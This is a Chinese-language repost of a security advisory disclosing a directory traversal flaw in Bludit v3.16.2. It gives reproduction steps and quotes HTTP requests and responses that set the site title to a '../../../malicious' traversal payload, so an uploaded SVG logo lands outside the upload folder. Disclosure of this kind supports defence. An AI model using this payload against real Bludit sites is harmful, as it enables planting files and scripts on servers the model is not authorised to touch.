Bludit v3.16.2 目录遍历漏洞深度解析

本文详细披露了Bludit v3.16.2中的目录遍历漏洞,包括利用步骤、HTTP请求/响应细节和SVG文件上传过程,展示了如何通过恶意payload实现路径穿越和XSS攻击,适合安全研究人员参考。

漏洞标题:目录遍历“网站标题” - Bludit v3.16.2

日期:2025年7月

漏洞作者:Andrey Stoykov

版本:3.16.2

测试环境:Debian 12

博客:https://msecureltd.blogspot.com/

目录遍历“网站标题” #1:

重现步骤:

  1. 使用管理员账户登录,进入“常规” > “常规设置”
  2. 将“网站标题”设置为以下payload:“../../../malicious”
  3. 接下来点击“Logo”并上传SVG文件

// HTTP POST 请求

POST /bludit/admin/settings HTTP/1.1 Host: 192.168.58.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 1208 Origin: http://192.168.58.133 Sec-GPC: 1 Connection: keep-alive Referer: http://192.168.58.133/bludit/admin/settings Cookie: BLUDIT-KEY=re283ptc2s1pd9emfuqhiulto2 Upgrade-Insecure-Requests: 1 Priority: u=0, i

[…]title=htdocs/bludit/bl-content/uploads/../../../malicious[…]

// HTTP 响应

HTTP/1.1 301 Moved Permanently Date: Sat, 28 Jun 2025 21:27:33 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 […]

// HTTP POST 请求上传SVG文件

POST /bludit/admin/ajax/logo-upload HTTP/1.1 Host: 192.168.58.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 […]

——geckoformboundaryb7a89b3d43771e77a278c9384a361332 Content-Disposition: form-data; name=“tokenCSRF”

59fc6f48ad5d60b39699491cada2390e1b42531b ——geckoformboundaryb7a89b3d43771e77a278c9384a361332 Content-Disposition: form-data; name=“inputFile”; filename=“evilsvgfile-xss-bypass.svg” Content-Type: image/svg+xml

------geckoformboundaryb7a89b3d43771e77a278c9384a361332--

// HTTP 响应

HTTP/1.1 200 OK Date: Sat, 28 Jun 2025 21:28:21 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 […]

{“status”:0,“message”:“Image uploaded.”,“filename”:"../../../malicious.svg",“absoluteURL”:“http://192.168.58.133/bludit/bl-content/uploads/../../../malicious.svg”,“absolutePath”:"/opt/lampp/htdocs/bludit/bl-content/uploads/../../../malicious.svg"}

root@debian:/opt/lampp/htdocs# ls -lah total 16K drwxrwxrwx 3 root root 4.0K Jun 28 17:28 . drwxr-xr-x 31 root root 4.0K Jun 3 16:26 .. drwxrwxrwx 7 debian debian 4.0K Aug 25 2024 bludit -rw-r–r– 1 daemon daemon 283 Jun 28 17:28 malicious.svg

// HTTP GET 请求访问SVG文件

GET /malicious.svg?time=0.3289154512636364 HTTP/1.1 Host: 192.168.58.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 […]

// HTTP 响应

HTTP/1.1 200 OK Date: Sat, 28 Jun 2025 21:28:21 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 Last-Modified: Sat, 28 Jun 2025 21:28:21 GMT ETag: W/“11b-638a8794da6e3” Accept-Ranges: bytes Content-Length: 283 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: image/svg+xml

_______________________________________________ 通过Full Disclosure邮件列表发送 https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次